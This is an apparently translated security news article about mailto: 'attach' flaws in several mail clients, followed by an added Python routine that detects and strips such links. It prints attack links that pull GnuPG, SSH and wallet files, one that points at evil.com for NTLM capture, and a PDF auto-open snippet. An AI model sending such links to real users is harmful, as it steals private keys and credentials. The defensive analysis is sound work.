Researchers from the Ruhr University in Bochum (Germany)
Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089), and Pegasus Mail were vulnerable to a trivial attack that automatically attaches any local file named in a link of the form "mailto:?attach=path_to_file". The file is attached without any warning, so a user who is not paying close attention may not notice that the email is about to go out with the file attached.
For example, a link like "mailto:[email protected]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" slips the user's GnuPG private keys into the email. In the same way the contents of cryptocurrency wallets (~/.bitcoin/wallet.dat), SSH keys (~/.ssh/id_rsa) and any other file the user can read can be sent out. Thunderbird additionally allows groups of files to be attached by wildcard, using constructions like "attach=/tmp/*.txt".
In addition to local files, some mail clients also process links to network shares and to paths on an IMAP server. In particular, IBM Notes fetches a file from a network directory when it handles a link like "attach=\\evil.com\dummyfile"; pointing such a link at an SMB server controlled by the attacker also allows NTLM authentication data to be captured, because the request is sent with the current user's credentials.
Thunderbird handles requests like "attach=imap:///fetch>UID>/INBOX>1/" to attach content from folders on the IMAP server. Messages retrieved from IMAP this way that are encrypted with OpenPGP or S/MIME are automatically decrypted by the mail client before being sent. Thunderbird developers were
Old versions of Thunderbird were also vulnerable to two other attacks on PGP and S/MIME proposed by the researchers. In particular, Thunderbird, as well as Outlook, PostBox, eM Client, MailMate and R2Mail2, were subject to a key swap attack, made possible because the mail client automatically imports and installs new certificates carried in S/MIME messages, which lets an attacker replace public keys the user has already stored.
The second attack, to which Thunderbird, PostBox and MailMate are subject, abuses the draft autosave mechanism: the mailto parameters are used to make the client decrypt an encrypted message, or add a digital signature to an arbitrary message, and the result is then transferred to the attacker's IMAP server. The ciphertext is passed in the "body" parameter, and a "meta refresh" tag is used to trigger the connection to the attacker's IMAP server. For example: ' '
Specially crafted PDF documents can be used to process "mailto:" links automatically, without user interaction: the OpenAction entry in a PDF runs the mailto handler as soon as the document is opened:
%PDF-1.5
1 0 obj
<< /Type /Catalog /OpenAction [2 0 R] >>
endobj
2 0 obj
<< /Type /Action /S /URI /URI (mailto:?body=-----BEGIN PGP MESSAGE-----[...]) >>
endobj
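The following triage routine, an added example rather than code from the article or from the researchers, parses a mailto: link the way a URL filter or a hardened client should: it keeps only the header fields RFC 6068 defines and flags the "attach" and PGP-in-"body" patterns described above (local path, wildcard, UNC share, imap:// URL). Function and variable names are the author's own choices, and the sample link is constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote, urlencode, quote

# RFC 6068 defines only these header fields for mailto:; "attach" is a
# non-standard client extension and is exactly what the attacks above abuse.
SAFE_HFIELDS = {"to", "cc", "bcc", "subject", "body"}

def _classify_attach(value: str) -> str:
    """Describe what an attach= value points at (every case is a finding)."""
    v = value.strip()
    if re.match(r"^(\\\\|//)[^/\\]+", v):
        return f"attach targets a UNC/network share (NTLM capture risk): {v}"
    # two or more scheme chars, so a Windows drive letter like C:\ is not a URL
    if re.match(r"^[a-z][a-z0-9+.-]+:", v, re.I):
        return f"attach uses a URL scheme ({v.split(':', 1)[0]}): {v}"
    if any(ch in v for ch in "*?["):
        return f"attach uses a wildcard (multi-file exfiltration): {v}"
    return f"attach references a local path: {v}"

def analyze_mailto(uri: str) -> dict:
    """Parse a mailto: URI and list the reasons a client should refuse or warn."""
    parts = urlsplit(uri)           # scheme, path (the to-list) and query
    if parts.scheme != "mailto":
        raise ValueError("not a mailto: URI")
    recipients = [unquote(a) for a in parts.path.split(",") if a]
    headers, findings = {}, []
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        key = key.lower()
        headers[key] = value
        if key in ("to", "cc", "bcc"):
            recipients.append(value)
        if key not in SAFE_HFIELDS:
            findings.append(f"non-standard hfield '{key}' (not in RFC 6068)")
        if key == "attach":
            findings.append(_classify_attach(value))
        if key == "body" and "BEGIN PGP MESSAGE" in value:
            findings.append("body carries PGP ciphertext (decryption-oracle pattern)")
    return {"recipients": recipients, "headers": headers, "findings": findings}

def sanitize_mailto(uri: str) -> str:
    """Rebuild the URI with only RFC 6068 fields, as a hardened client would."""
    parts = urlsplit(uri)
    kept = [(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True)
            if k.lower() in SAFE_HFIELDS]
    query = "?" + urlencode(kept, quote_via=quote) if kept else ""
    return "mailto:" + parts.path + query

if __name__ == "__main__":   # constructed sample modelled on the article's GnuPG link
    s = "mailto:alice@example.org?subject=Title&body=Text&attach=~/.gnupg/secring.gpg"
    print(analyze_mailto(s)["findings"], sanitize_mailto(s), sep="\n")
```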
Source: opennet.ru